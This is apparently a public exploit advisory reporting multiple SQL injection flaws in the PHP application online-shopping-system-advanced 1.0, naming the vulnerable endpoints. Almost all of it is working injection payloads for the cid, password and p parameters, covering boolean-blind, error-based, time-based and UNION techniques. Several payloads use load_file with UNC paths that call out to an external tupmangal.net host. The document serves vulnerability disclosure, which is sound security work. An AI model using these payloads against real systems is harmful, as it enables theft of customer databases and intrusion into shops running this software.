## Title: online-shopping-system-advanced-1.0 SQLi ## Author: nu11secur1ty ## Date: 10.01.2022 ## Vendor: https://github.com/PuneethReddyHC/online-shopping-system-advanced ## Software: https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/refs/heads/master.zip ## Reference: https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51 The online-shopping-system-advanced-1.0 suffers from multiple SQLi The attacker can steal all information from the database of this system. Status: CRITICAL [+] Exploit: ```MYSQL Parameter: cid (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' OR NOT 4084=4084 AND 'icSi'='icSi Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT (ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL# ``` -------------------------------------------------------------------------------------------- ```MYSQL Parameter: password (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT 7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on ```` -------------------------------------------------------------------------------------------- ```MYSQL Parameter: p (GET) Type: boolean-based blind Title: MySQL boolean-based blind - Parameter replace (MAKE_SET) Payload: p=MAKE_SET(3691=3691,8073) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR) Payload: p=(SELECT 4211 FROM(SELECT COUNT(*),CONCAT(0x71706a7171,(SELECT (ELT(4211=4211,1))),0x7171717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment) Payload: p=60'+(select load_file('\\\\9x7re23uz38xdqq4hj8u4e8ba2gv4vzjqmed13ps.tupmangal.net\\eyn'))+' (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C) ``` ## All: ```txt [1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]] [1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]] [1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php [password parameter]] [1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]] [1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]] [1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php [email parameter]] [1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [name parameter]] ``` # Proof and Exploit: [href](https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51)